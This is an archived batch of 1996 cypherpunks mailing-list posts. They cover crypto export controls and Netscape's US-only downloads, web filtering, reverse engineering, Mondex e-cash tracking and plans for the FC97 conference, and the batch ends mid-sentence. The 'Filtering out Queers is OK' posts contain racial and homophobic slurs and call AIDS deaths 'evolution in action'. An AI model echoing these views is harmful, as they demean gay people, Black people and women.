In-Reply-To: <31EEDA69.31D8@netscape.com>
Message-ID: <31EFC5E8.4028@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Peter D. Junger wrote:
 
> Would it be possible to get a copy of the terms of the written
> permission that I gather Netscape has received from the government?
> Or is this another area where the government insists on obscurity?

I don't know.  Some people here are asking to release that.

If I recall, the letter only says something like "using the 
mechanism defined in our meeting of M/D/Y."  I could be wrong.
Everyone in the room took copious notes, so this is not
an "opportunity" if you're inclined to think that way.

--
Tom Paquin            Netscape Communications Corp
about:paquin




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Sat, 20 Jul 1996 02:22:12 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: Gorelick testifies before Senate, unveils new executive order (fwd)
Message-ID: <199607191430.KAA16845@nrk.com>
MIME-Version: 1.0
Content-Type: text


SternFUD claims:

> There are exceptions to ITAR for this purpose (overseas offices of US
> companies). 

Clearly UnProfessor failed to read recent Phil Karn's testimony
at the Senate Subcommittee.

Phil, representing both himself *and Qualcomm* explained how
Qualcomm had attempted to export a Triple DES application to
their own Hong Kong office, *for use by the AMCIT employees there*
to communicate with Califunny.

The request was denied with a FORM LETTER checked "resubmit a
non-Triple DES method" or words close to that.

Further, Phil told the Subcommittee that every time they need a
bug fix on the CDMA code running on the system in HK; they must
resubmit the whole package back for approval. A BUG FIX! They've
been through this many times, each one taking eons.

Just suppose ARCO needed all new permits every time they adjusted
the crude mix, or retuned the cat cracker?

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: somebody@tempest.ashd.com
Date: Sat, 20 Jul 1996 04:18:48 +0800
To: harka@nycmetro.com
Subject: Re: Secure IRC conversations
In-Reply-To: <TCPSMTP.16.7.18.15.31.48.2780269260.1197732@nycmetro.com>
Message-ID: <Pine.GSO.3.93.960719103316.4511A-100000@tempest.ashd.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 18 Jul 1996 harka@nycmetro.com wrote:

> Hi there,
> 
> does anybody know of a way to have encrypted conversations on the IRC or via ytalk?

	If you use a unix irc client there is a function call for crypt
that can be used to crypt decrypt data with a key. This not the best or
most secure way of doing things but it does work and it is easy to make
use of many of "Elite/warezpuppy/gotnobrian wanna b" scripts have this
already coded in. Example are phoenix, venom, and the list goes on.

						Carlos





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 20 Jul 1996 23:27:00 +0800
To: cypherpunks@toad.com
Subject: Re: Filtering out Queers is OK
Message-ID: <ae15128f0c0210045d3a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:48 AM 7/19/96, Mike Duvos wrote:

>Filtering is wonderful.  Long live filtering.
>
>I used to read "Scientific American" too, back in the days when
>the table of contents wasn't illustrated with cute little icons.
...

Well, of course I agree, and have said as much. "Sci Am" used to be so much
better, before the "Wired"  people moved in. (As to comments by some others
that both of the mags I cited have carried articles about piercings,
tattoos, gay rights, blah blah...of course, I would not expect otherwise.
It is the blaring of the issues that I avoid, not all mention.)

>If I had kids, I am sure Tim would support my right to give them
>access to the entire universe of human knowlege and thought as
>early as possible, and to let them form their own opinions on
>every conceivable subject, even if those opinions differed from
>my own.  Where I suspect we differ, is that I would not only
>advocate such an advantage for my kids, but for his as well.

No, we wouldn't differ, depending on what is meant by "advocacy." You are
perfectly within your rights to advocate what you wish, and I may even
listen. Where advocacy crosses into coercion is where I draw the line.
Mandatory indoctrination in schools which are either mandatory to attend
(given the truancy laws) or taxpayer-funded is "coercion" in my book.


>The problem with giving parents the absolute right to control
>their childrens' input of memes until the children are too old
>and stupid to learn anything new, is that it creates generational
>propagation of obsolete ideologies.  All the Dole children think
>exactly like Bob.  All the Hitler children think exactly like
>Adolf.  Same for the Mengele children, the Nixon children, the
>Stalin children, the Netanyahu children, etc...

Well, I rather doubt this. The Kennedy children were liberals, not fascists
like dear old Dad. Most tycoons have liberal, do-gooder children. Newt's
half-sister is as different from Newt as one can imagine. And so on.

In any case, even conceding your point (which I don't), the fact that
certain memes tend to get propagated generationally is no argument for
forced intervention by the State in the home situation.



>The movement towards accessing information from home PCs, coupled
>with the new "parents rights" movement and filtering software,
>creates a situation where no one under the age of 18 can have
>access to any information their parents don't want them to see.

I don't support the CDA or any other such laws felonizing what I or other
content providers offer. Thus, "Tim's Really Kool Sites" could offer access
to all sorts of material.

If a parent blocks access to this, this is not an issue for the State to
worry about. (By State I include other entities beside the family.) If,
however, Junior's friends have unrestricted access, he can access the
interesting sites there.

(And no, this would not be a matter for the State (courts) to interfere
with. Think of it this way: it is _still_ up to parents to control
access...that is the consistent principle.)

>As the Web replaces the library, young people won't even be able
>to preserve the same anonymous access to controversial
>information they have always had in the past.  This is a step
>backwards for youth rights.

They should use Web proxies. And they are welcome to come to my house and
use my Web tools! (Again, no law should forbid either proxies or
"library-type" use, consistent with a non-coercive society.)

>The age of filtering has arrived.  You can filter your childrens'
>access to sex manuals, grandma's access to the elder abuse web
>page, and your underpaid Ethiopian leaf blower operator's access
>to anything having to do with laws against sub-minimum wages or
>slavery.

I can't filter my Ethiopian's acces to the Web if he has his own account,
on his own system. I suppose if I were paying for it, or if I were letting
him use my system, then I would have whatever filters invoked that I
wished. Seems fair to me. ("My house, my rules.")

A more realistic and timely example is that corporations are restricting
access to pornographic and/or frivolous sites on the Web...seems a lot of
folks at large companies tend to do exactly what I like to do: wander the
Web and find interesting stuff. Except I'm on my own time, employees at
Lockheed and Intel who look like they're busy on the Web actually aren't,
by the standards of their companies.

(How long will it be before someone builds one of those buttons that
immediately switches a screen from "Minka's Sex Page" to a harmless-looking
spreadsheet or seemingly work-related Web page? I guess with multiple
windows and URL navigating, a fast employee can still save himself....)

>As an individual who has no desire to engage in gay sex, or watch
>it being performed while I am eating, I must admit my attitudes
>towards the "gay community" have undergone a certain evolution in
>recent years.  Back in the '70s, gays supported a wide-ranging
>platform of human rights issues, and a lot of activists whose
>work I admired on many issues I supported "happened to be gay."

My feelings exactly. The issue is part of a larger one, related to several
interconnected trends/tropics, which I don't have the desire or time to
discuss and so will simply list:

- stridency, shrillness and militancy (where "demands" are made, chants are
yelled, bridges and highways are shut down, etc.)

- short attention spans, soundbites (in the press, magazines, etc.)

- calls for legislation, indoctrination ("more laws")

- "reclaiming" of names (blacks call themselves niggers, blacks demand that
others call them "persons of color," homosexuals demand universities set up
"Queer Studies" programs, etc.)

I catch some interesting flak here in Santa Cruz for openly referring to
blacks as "coloreds." (Hey, didn't they reclaim this name? All
non-Caucasion males are, in this town, "persons of color." Thus we have
"students of color," "queers of color," and the stupid phrase chanted in
marches, "all womyn are people of color." Fine, "colored people" it is!)

Likewise, what were once "homosexuals" became "gays." OK, I adopted this
usage along with most of the rest of the country and world in the 70s. But
now there are the aforementioned demands that "queer" be used. (This has
become quite prevalent here in Northern California, with departments of
Queer Studies, Queer Rights, etc. all over the place.) What's next, demands
that we create "Fag Studies" and "Dyke Culture" departments on campus?

>Now that the gay community has narrowed its focus solely to the
>issue of consensual adult sodomy rights, and shown alarming signs
>of sucking up to the Radical Religious Right, I really don't have

Including the charming principle "all heterosexual sex is rape." All
pornography is degrading to womyn and other people of color, unless, of
course, it is part of the (I gather) large corpus of homosexual porn. So
much for consistency. (Shockingly, Canada passed some laws restricting porn
based on the arguments of feminazis like Andrea Dworkin and Catherine
MacKinnon; they had egg on their face when lesbian erotica stores were
raided.)

I could go on about the bigotry of many "activists" in these communities.
(I'm sure many are fine people, of course. It's the "in your face" queer
activists demanding new and anti-liberty laws I object to.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bill Olson (EDP)" <a-billol@microsoft.com>
Date: Sat, 20 Jul 1996 14:41:24 +0800
To: "'jti@i-manila.com.ph>
Subject: RE: Reverse Engineer
Message-ID: <c=US%a=_%p=msft%l=RED-16-MSG-960719175739Z-29104@tide19.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>
>What do you mean by "reverse engineer?" I have heard this word several times
>especially in the world of hacking, but... can someone tell me what it really
>meant?

Reverse engineering is process of 'mimicking' the specifications of
another product by copying the 'abstract interface' of it. Example: 

I write a desktop application that greatly increases employee
productivity, and it sells like hotcakes. Another company decides that I
am gaining too much market share with my product and decides to reverse
engineer the product so that they can create a competing product. They
hire an engineer who takes the program and analyzes the input and output
with a detailed script of test patterns (heaven forbid he might even
decompile the program and snoop). By doing so, he now has a complete
product specification minus the implementation (i.e. how it works). He
then takes the product specification and gives it to another engineer
(actually it's done through 'clean' liaisons) who then creates a product
that does the exact same thing as mine--but with a different
implementation process. Because the product copies the specification and
not the implementation, it does not infringe on copyrights or patents.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Paquin <paquin@netscape.com>
Date: Sat, 20 Jul 1996 21:43:34 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape download requirements
In-Reply-To: <2.2.32.19960719084701.006a8aac@gonzo.wolfenet.com>
Message-ID: <31EFCCCC.B13@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Cerridwyn Llewyellyn wrote:
> 
> Allow the government to think that we think it has the right to give
> us their permission and we've lost everything.

Unfortunately, I am involved n a business, and what is acceptable
or humiliating for free individuals is fiercely practical, not
philosophical.  Quite in particular: my president solicits
the best legal advice he can get, and decides whether or not
he, himself, wants to go to jail, and what the risk of that is.
"Free" takes on a whole new meaning.  I cannot appeal to his sense
of how severe the risks are.

> Exporting crypto-systems and killing people is comparing apples
> and hand grenades.  Please come up with a relevant analogy.

You missed the point.  Right now the government is in the midst
of a policy review.  Your inclination to view that policy as
irrlevant simply doesn't matter.  Proving to them that a more
tolerant policy would not be in their interest is not in our
interest.

Screw with this system and I can bet how the policy review
will come out.


> 1)  Please don't chastise individuals who take direct action and use
> civil disobediance as a measure to change bad laws and policies (ie by
> making your companies software available internationally).

Fine.  Go there, do that.  Please don't use our mechanism as
an integral part.  Once you have the data, there are all sorts
of ways you can exercise considerable civil disobedience completely
on your own without involving our mechanism.
 
> 2)  Please don't misuse the information you gain by logging all your
> network traffic.

We log everything having to do with the US downloads.  I'm not
involved in the eleventy-skillion other net connections which
come in here.  
 
> I agree mostly.  I would rephrase, however, to say: In addition to
> attacking odd pieces of enforcement, participate in the debate over
> the regulations themselves.  

You may or may not have noticed, but our president has testified,
effectively, in Washington several times.  We participate in 
"public" (means govt) debate on this heavily.  We are engaged.

> Besides, contrary to your gist, this
> is probably one of the most prominent pieces of enforcement, and
> therefore a very logical candidate for attack.

Like I said, if you want to attack, please attack without dragging 
our mechanism into it.  Allow companies to provide you the data 
while you mount your attack.  You can be more effective.  You'll
have more tools.  More will be out there.  More of you will
have access to something to be disobedient with.

My very personal opinion: I loathe giving out my phone number
to anonymous corporate entities.  I do it from time to time, but
never without a bristle.  I would prefer if we weren't asking
for it, but I'm engaged in an opitimization exercise, or you
might look at it as minimization of evil.  Whatever.

--
Tom Paquin            Netscape Communications Corp
about:paquin




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Paquin <paquin@netscape.com>
Date: Sat, 20 Jul 1996 21:24:11 +0800
To: cypherpunks@toad.com
Subject: Re: US versions of Netscape now available
In-Reply-To: <199607191213.OAA03214@basement.replay.com>
Message-ID: <31EFCCF5.5E5C@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Alex de Joode wrote:

> I would like to know what Netscape's position on the above mentioned
> scenario is .. (Uploading "possibly" received 128 bit binaries to
> official netscape mirrors outside the US, that is) (guess why ...)

I guess I should look again, but I *thought* our licenses explicitly
excepted use of "US-Only" software (defined in the license) from the
standard exclusions.  I think the attys lifted some of the definitions
straight from ITAR and may have quoted 22USC.  Maybe we screwed
up and got the wrong license in the beta and missed the check.
I don't know.  I'll look.  *sigh*

As far as company policy goes, it's a good bet that we won't
willingly break any laws.  Licensing export-restricted software
to a "foreign person" (includes companies, etc) without a
particular export license would probably be a mistake which would
get corrected quickly.

We have made some mistakes. Occasional known distribution 
errors have occured, and in each case we do what the law
says: notify ODTC, and do whatever we can to clean up.  Nothing
big and nasty has come up and I think ODTC has been fine with us.
To my knowledge, every cleanup attempt has been met with cooperation
from all hands involved.

--
Tom Paquin            Netscape Communications Corp
about:paquin




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 20 Jul 1996 02:36:41 +0800
To: harka@nycmetro.com
Subject: Re: Secure IRC conversations
In-Reply-To: <TCPSMTP.16.7.18.15.31.48.2780269260.1197732@nycmetro.com>
Message-ID: <199607191510.LAA04553@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



harka@nycmetro.com writes:
> does anybody know of a way to have encrypted conversations on the
> IRC or via ytalk?

An encrypted version of ytalk is available -- you'll have to hunt
around to find it.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 20 Jul 1996 21:06:03 +0800
To: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Subject: Re: Surf-filter lists
In-Reply-To: <2.2.32.19960718232909.006ab4e4@gonzo.wolfenet.com>
Message-ID: <199607191810.LAA07845@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


agree with most of your points CL, but

>That is another problem, not the Real Problem.  The Real Problem is that
>parents are scared to have to explain to children why something they've
>seen is wrong or bad.  They are afraid to teach their children their
>beliefs and values, so instead would rather just filter everything that 
>conflicts with those beliefs, so that they believe it by default. This is
>a big problem when those children grow away from their parent's influence
>though, and creates bigotry and intolerance. (They don't know why they
>believe what they do, but believe it with fearful vengeance).

as I wrote in the CuD article, it seems pretty darn reasonable to
me to adopt a philosophy in which the younger the kid, the more
that is blocked, and to decrease this blocking to none at all as
they get older. the argument is not, "to block or not to block"
as a lot of black-and-white polarized accounts are portraying it.

I would like to see people stop ranting at parents merely because
they want to block things like sex, violence, pornography, etc.
especially when younger children are involved. I'm amazed at how
often I see this argument, "the problem is not junk on the internet,
the problem is hypersensitive and backward parents who can't 
innoculate their children".

frankly I think
that's what childhood is all about: not being exposed to all the
harsh aspects that grownups call "reality". do we ask that children
work in factories and make their own living? of course not. 
childhood is about *not* being exposed to the full harshness of
reality, about being insulated from it by protective parents. 
it's a very innate and natural instinct for parents to
embrace-- virtually the definition of parenthood. 
admittedly it can become authoritarian, but at root
it's very basic to human nature.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 20 Jul 1996 03:11:52 +0800
To: cypherpunks@toad.com
Subject: Re: BIG_dif
Message-ID: <2.2.32.19960719151139.0083afac@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


>      Because of these concerns, Mondex has been modified in 
>      the United States so that banks will be able to track 
>      card use. That will allow them to audit for fraud, if 
>      not recreate every transaction. Data from Mondex cards 
>      will be used for various product marketing. 
> 
>      "We believe there should be privacy, but there is a big 
>      difference between privacy and anonymity," Dudley Nigg, 
>      executive vice president of Wells Fargo, said. 

So, how will the identity of the cardholder be tracked when they are
transferred physically from one person to another?

Presumably bank tracking will only work when the card is submitted to a
"public" terminal.  "Wallet" transfers won't be tracked immediately.  Also,
if an API is realeased, interesting possibilities are created.

DCF






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Sat, 20 Jul 1996 03:07:38 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: PictureTel Licenses Cylink Security Technology For Encrypted Videoconfe (fwd)
Message-ID: <199607191526.LAA17075@nrk.com>
MIME-Version: 1.0
Content-Type: text


Message-ID: <BcylinkURQwQ_6lJ@clari.net>

Clarinet reports:
  	  				 
   SUNNYVALE, Calif.--(BUSINESS WIRE)--July 19, 1996--Cylink Corp.  
(NASDAQ: CYLK) today announced that it has licensed its patented 
security technology, the Diffie-Hellman, Hellman-Merkle patents 
covering public key cryptography, to PictureTel Corp. (NASDAQ:PCTL) 
to be used in its System 4000 group videoconferencing systems. 

   The Cylink license allows access to all implementations of  
Public Key cryptography, including Diffie-Hellman key exchanges and 
Digital Signature Standard (DSS), .....



==============
Hmm.....

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gimonca@skypoint.com (Charles Gimon)
Date: Sat, 20 Jul 1996 16:19:11 +0800
To: cypherpunks@toad.com
Subject: BIG_dif (fwd)
Message-ID: <m0uhIP1-00035JC@skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded message:
> Date: Fri, 19 Jul 1996 12:59:14 GMT
> From: jya@pipeline.com (John Young)
> 
>    7-19-96. NYP: 
>  
>    "AT&T and Wells Fargo Investing in an Electronic Cash 
>    Card." 
>  

[etc.]

>       Because of these concerns, Mondex has been modified in 
>       the United States so that banks will be able to track 
>       card use. That will allow them to audit for fraud, if 
>       not recreate every transaction. Data from Mondex cards 
>       will be used for various product marketing. 
>  

In other words, they took a bad product and made it worse.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Sat, 20 Jul 1996 20:00:34 +0800
To: cypherpunks@toad.com
Subject: Re: Filtering out Queers is OK
In-Reply-To: <ae143914000210044473@[205.199.118.202]>
Message-ID: <v03007603ae1582394f16@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:07 PM -0700 7/18/96, Timothy C. May wrote:

>Filtering is not "wrong," Cerridwyn, it is a rational response to garbage
>being spewed constantly. I filter lots of items. I read "Scientific
>American" and "The Economist" because they filter (or "censor," in the
>sense some are objecting to here) nonsense about "queer rights" and
>"peircing fashions," to name but a few things I have no interest in hearing
>about.

<omitted>

>
>I think of AIDS as "evolution in action." Retroviruses which  have existed
>for millenia now find new vectors for spreading in our population. I cry no
>tears for those dying of AIDS, and work to reduce to tax dollars spent on
>such things as "AIDS research." Let those who introduced the new vector pay
>for the research.

Pretty good summary of one position. I'd add that in addition, some groups
you mention blackmail society by being loud and in your face, and prey on
others' fear of being thought politically incorrect, to gain amounts of
public treasure and air time vastly disproportionate to their needs or
their problem in the heirarchy of needs and problems facing society.

Putting it a bit more directly, gays are a small percentage of society but
many are constantly demanding air time, infiltrating the media to create
exposure vastly disproportionate to their numbers, and demanding public
funds per capita way in excess of what the poor, the heart-disease or
cancer-ridden, or the heterosexuals get for _their_ needs. In their latest
attempt at public blackmail they're trying to get the nation to agree that
we should provide incentives for homosexual marriages (the marriage
benefits of Federal law are incentives to behavior society wants to
encourage, not an inherent "right" of marriage).

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Rogaski <wendigo@pobox.com>
Date: Sat, 20 Jul 1996 04:10:13 +0800
To: jti@i-manila.com.ph (Jerome Tan)
Subject: Re: Reverse Engineer
In-Reply-To: <01BB752B.7DCF4600@ip65.i-manila.com.ph>
Message-ID: <199607191530.LAA13859@apollo.gti.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

An entity claiming to be Jerome Tan wrote:
: 
: What do you mean by "reverse engineer?" I have heard this word several =
: times especially in the world of hacking, but... can someone tell me =
: what it really meant?
: 

Reverse engineering is the process of taking a piece of executable code,
be it a Win95 program or firmware for a cellular phone eeprom, and
running it through a disassembler.  The disassembler converts the
machine code into assembly instructions.  From there, a person with
a lot of spare time, a good understanding of compiler design, and a lot
of caffeine can translate the assembly instructions into a higher level
language (ie. C, C++, VisualBasic).  The first part is easy (and writing
a disassembler is a good project for upper-level Comp Sci courses), but
the second part is a real bear and people with the knowledge and 
drive to do it have my respect.

- -- 
    Mark Rogaski   | Why read when you can just sit and |      Member
  GTI System Admin |         stare at things?           | Programmers Local
  wendigo@gti.net  | Any expressed opinions are my own  |     # 0xfffe
 wendigo@pobox.com | unless they can get me in trouble. |     APL-CPIO


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMe+p8g0HmAyu61cJAQEyFAQAq+zOnHz6ZV+dtKZ08hSXkoLMEsteJXP3
NPnYRmfnGf+Xtl9GJaewMqYbXIbGTYePDlAqXw0Oxa3AI4+vtyQAe1u4PbqUdqHq
rgvqW9xYnR41U3eFAgp1WjINAZa5am6C1CpQxwI6oETmF8S6uMtJpBQxpYMKBUSA
8NhOKhQfuaE=
=+ZvY
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dani@193.144.104.4 (dani diaz)
Date: Fri, 19 Jul 1996 20:47:22 +0800
To: cypherpunks@toad.com
Subject: GOPHERD FOR SOLARIS 2.5
Message-ID: <199607190933.CAA20979@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi!,
        
      I´m looking for a gopher server for Solaris 2.5, I´ve tried in the
Sunsite, but succesless.
        
        Does anybody know where else may I find a gopher server for Solaris
2.4?.

        Thanks in advance.

        Danny. dani@gva.es
   _/_/_/_/  _/_/_/  _/    _/ _/_/_/ Daniel Díaz Luengo. dani@gva.es
    _/  _/  _/  _/  _/_/  _/   _/       Consellerìa de Presidència
   _/  _/  _/_/_/  _/  _/_/   _/              C/Micalet nº5.
_/_/_/_/  _/  _/  _/    _/ _/_/_/            Valencia-(Spain)
                                              (96)-386-38-57                   





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 20 Jul 1996 23:02:35 +0800
To: cypherpunks@toad.com
Subject: FC97: Anguilla, Anyone?
Message-ID: <v0300761bae153e64c32e@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

July 19, 1996
Boston, Massachusetts


"What are you doing the last week of February, 1997?  How about going to
Anguilla?"

Those are the two lines which started an awful lot of interesting stuff...


It was the end of May, and I was winding up a contract for someone, and was
thinking about what to do next. I got to thinking about what a great year
it has been since about September or so, when 36 Boston-area financial
cryptography types, Peter Cassidy and I founded the Digital Commerce
Society of Boston.

Since then, the whole idea of actually selling stuff over the net, not just
displaying it there, has really caught on. I've written rants all over the
net, done guest editorials for InfoWorld and Wired, spoken at Apple and
Internet World, and done lots of other great stuff, all around the emerging
technology of digital commerce, and, in particular, financial cryptography
on public networks.

We've had speakers at DCSB ranging from Win Treese of Open Market and
Donald Eastlake of Cybercash, to Mark Bernkopf, a certified Beltway Bandit,
by way of the Fed's Open Market Operations and the Clinton White House, to
a well-known cypherpunk, Perry Metzger, giving a talk wryly titled
"Gold-Denominated Burmese Opium Futures?".  Julie Rackliffe, membership
manager of Boston's Computer Museum, has been an enormous help, organizing
the first of the Society's large activities, a networking party at the
Downtown Harvard Club's 38th-floor lounge, featuring a beautiful sunset,
and complementary cocktails and hors' deuvres, all sponsored by the Open
Software Foundation.


At the Computers, Freedom and Privacy conference in April, I met Ray
Hirschfeld, manager of CWI, and director of the CAFE digital cash project.
I also met Ian Goldberg, who made himself famous this winter by hacking a
great big hole in Netscape's SSL protocol, and then, a few months later,
doing the same thing to Digicash's ecash mint software, both of which are
now much safer to use as a result of his efforts.

That evening, in a digital-coin session that lasted until about 2 AM, about
10 of us die-hards, including Ian and Ray, talked about the emerging
technology of financial cryptography, and how it was going to be impossible
for anyone to ignore Real Soon Now. Other people, ;-), muttered about
"asking forgiveness, not permission" from the various government regulators
around the world, and just making stuff like anonymous digital cash a fait
accompli on the internet from a small island banking haven somewhere.


Thinking about all this reminded me of someone else, who actually *lived*
on a small island banking haven, Vince Cate, another cypherpunk who founded
Offshore Information Services, on the island of Anguilla in the eastern
Carribbean. When I was a kid, I used to live on nearby St. Thomas, and as a
result of our common interests in everything from kitesailing and
multihulls to technomadness, Vince and I found ourselves on lots of other
e-mail lists besides cypherpunks. This winter was especially nasty in
Boston, and I found myself pining for the tropics more than once,
particularly in February, when the weather was its worst...


And then, as they say here in Massachusetts, "Dawn broke on Marble-head."
It all came together: Why not have a financial cryptography conference, in
February, on Anguilla? Someplace where, given the internet access already
there, someday, someone could actually create the "First Anonymous Bank of
Cyberspace". (Well, maybe not this year. ;-)) This conference idea just
kept sounding better and better. I kept tweaking it as I thought about it.

I thought it should be a peer-reviewed conference, where people could not
only talk about the state of the art in cryptography as it is applied to
finance, but the states of the art in finance, law, and economics, as they
applied to strong cryptography on a public network.

I added a workshop the week before, where the technically clueful but
cryptographically unaware could get hands-on training in setting up SSL
servers, or Digicash mintware, or learn about digital bearer certificates
and other animals in the financial crypto bestiary.

I thought about exhibit space, where people could show their wares. About
having the bandwidth to support this... and that's when I e-mailed Vince
Cate with the idea, starting with the line, "Vince, what are you doing in
February?"

Vince *really* liked the idea. :-).

We kicked stuff around for a bit, and I then approached Ray Hirschfeld
(with the same two questions you see at the top of this letter), to see
whether he'd be interested in putting together a conference committee and
running the conference from the "content" side. After some thinking, he
came back with a "yes", and, after I got myself off the floor, ;-), I
e-mailed Ian Goldberg, who said *he'd* be interested, *if* he could get his
advisor at Berkeley to approve Ian's taking some time off in February,
which he thought probable. I e-mailed Julie Rackliffe, and she said she'd
be delighted to moonlight a bit and handle marketing for both workshop and
conference, and the management of the conference itself. Vince came back
later with what looks to be a conference site, complete with estimates for
T1 internet access (yes, Virginia, there are T1s in the Caribbean). The
site, like the rest of Anguilla, came through Hurricane Bertha with flying
colors.

Ray has even come up with a simple name for the conference, "Financial
Cryptography 1997", or FC97, with apologies to Mr. Kaczynski. :-).

Ian came back to say he was in.

So, it looks like we're ready for the next step, which is to raise money
from about 10 charter sponsors to cover what will be our sunk costs prior
to collecting revenue for exhibit space, workshop and conference revenue.


Here's what what we have in mind so far...

Ray has started to assemble the conference committee with some impressive
names on it so far -- including some who will surprise you -- which will
referee papers.  We're hoping for the conference as a whole to be more in
the way of a union of cryptography and finance than an intersection of the
two fields. The conference procedings will be published, particularly on
the web, but on paper as well.

The conference itself will run from Monday, February 24, through Friday,
February 28, 1997, from the hours of 8:30AM to 12:30PM. The afternoons will
be taken up with various sponsored activities, one each afternoon,
including lunch, and each evening, including dinner. We're figuring that
the total number of conference hours in this conference will be the same as
most other technical conferences, but they'll be stretched out over the
whole week.

We did this for several reasons. The first is, we're in Anguilla, and
people *will* bug out in the afternoons whether we want them to or not, so
we might as well bug out together, and the second is *also* that we're in
Anguilla, and people can't go anywhere else after going to all the trouble
of getting there anyway, so we might as well stretch the conference out
over the whole week. :-). Finally, like Cannes, people will be going to
this conference for much more than the technical sessions. We're leaving
lots of time for informal discussions and networking, and, of course, for
seeing the exhibits and products of our sponsors and exhibitors.

We're currently hoping for a target price for a conference ticket of (all
prices in US dollars) $1,000, a nice round number, which should include
breakfast. Lunch and dinner will be paid for by the afternoon activity
sponsor and the evening activity sponsor, respectively. We're hoping to
arrange conference discounts on airfare to Anguilla and lodging.

The workshop, run by Ian Goldberg, and to be held the week before (February
17/24), will run during the same hours, 8:30 AM to 12:30 PM, but, given the
educational nature of the workshop, the afternoons and evening will be open
for lab time to experiment with new technologies and to learn more on one's
own or in the company of one of the instructors. We want a 5-to-1
student-instructor ratio, and we're planning to hire instructors, all known
to the net community, who, along with their stipend, will receive a
complementary conference ticket and room and board for three weeks (one
week pre-workshop preparation, and one week each for the workshop and
conference). We plan to charge $5,000 for each workshop participant. We
want to have a T1 to the net, a workstation for each participant and
several different kinds of servers to work with.

There will be exhibit space for companies who just want to exhibit and not
be a conference sponsor. These companies will also get 2 conference tickets
per booth. There will also be booths reserved for charter sponsors at
discount prices.


So, right now, we're looking for 10 charter sponsors.  These companies will
have their names on all conference communications, including e-mail,
banners, and collateral literature. In addition, their names will be on
either an afternoon or evening activity, including dinner or lunch, where
applicable. They also get 5 conference tickets, and that discount on booth
space.

As I said before, the sponsorship money will be used to cover sunk costs:
advance fees, deposits and the like, plus an operating reserve. Money
various people are going to want up-front, before proceeding with any work.
A full accounting of money spent will be available to the sponsors, since
we consider them our most important stakeholders in this first-ever
Financial Cryptography conference and workshop.

Of course, as we determine costs for specific things, there will also be an
opportunity for sponsors in-kind, but right now, we're looking for actual
money. :-).

Upon collection of revenue from the conference, workshops, and exhibits,
paying off the costs incurred to date, the sponsorship money will then be
used to pay for the specific activity they want to sponsor. Any money left
over, of course, is ours, :-), but sponsors *will* get their money's worth.
We promise.

Ray and the conference committee are getting reimbursement for their
expenses, but in the "chinese wall" tradition of these kinds of
conferences, they are not being paid anything for their time. Ian, as
workshop leader, is getting paid a good fee for his time (*much* better
than t-shirts and bugs bounties), plus a share of the workshop's profits,
if any, and the workshop instructors will get a good stipend. Vince, Julie
and I are going to get paid for our efforts (well, we hope :-)) but,
believe me, nobody's going to get rich doing this conference, by any
stretch. We'll all be very happy if we can make it happen, everyone is
happy when it's over, and we get paid reasonably for the time we spent on
it.

The sponsors' choice of activity blocks, afternoon or evening, or for any
day of the week, will be on a first come, first served basis. The first 10
sponsors to get us a check gets those slots. If we don't get enough
